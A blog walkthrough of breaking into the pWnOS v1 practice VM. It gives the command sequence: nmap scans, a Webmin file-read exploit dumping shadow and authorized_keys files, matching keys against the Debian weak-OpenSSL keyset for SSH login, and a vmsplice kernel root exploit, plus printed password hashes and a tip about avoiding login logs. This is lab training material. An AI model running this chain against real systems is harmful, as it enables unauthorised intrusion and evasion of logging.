pWnOS

This is my walk though of how I broke into pWnOS v1.

pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/pWnOS_1.mp4

Scenario

A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems. It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t :).

Tools

  • BackTrack 4 (Final)
  • pWnOS.vmdk
  • exploit-db.com or milw0rm.

Software

Name: pWnOS

Version: 1

Home Page: N/A

Download Link:

  • hxxp://krash.in/bond00/new/pWnOS v1.0.zip
  • hxxp://0dayclub.com/files/pWnOS v1.0.zip

Forum/Support: hxxp://forums.heorot.net/viewforum.php?f=21

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
nmap 192.168.3.1-255

nmap -sV -sS -O 192.168.3.100

firefox http://192.168.3.100

firefox http://192.168.3.100:10000


firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin  save. Filename: shadow

firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
        (perl)
        (python)
        (ruby)
 (perl)
 (python)
 (ruby)

wget

perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys

tar jxvf debian_ssh_rsa_2048_x86.tar.bz

cd rsa/2048

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca pYh  phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7 t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9 6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 [email protected]
exit

ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 [email protected]
hostname
uname -a

firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
         (c)
  (c)

nano vmsplice.c

gcc vmsplice.c -o vmsplice

./vmsplice

whoami



----------------------------------------------------------------------------------------------------
Users
root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------

Notes

  • I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file.
    • The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for extra info).
  • This is one method of getting in, the author did say that there is multiple ways in!
  • It took me a bit of work to also to get it to work with virtual box & static IP addresses.
    • Read my post here (hxxp://forums.heorot.net/viewtopic.php?f=21&t=373&sid=0c8dfabcd25921209e26bf92fb8c44d3) (short answer - need configure another interface via another OS)

Song: Deadmau5 - Faxing Berlin

Video length: 07:37

Capture length: 14:55

Blog Post: https://blog.g0tmi1k.com/2010/04/pwnos/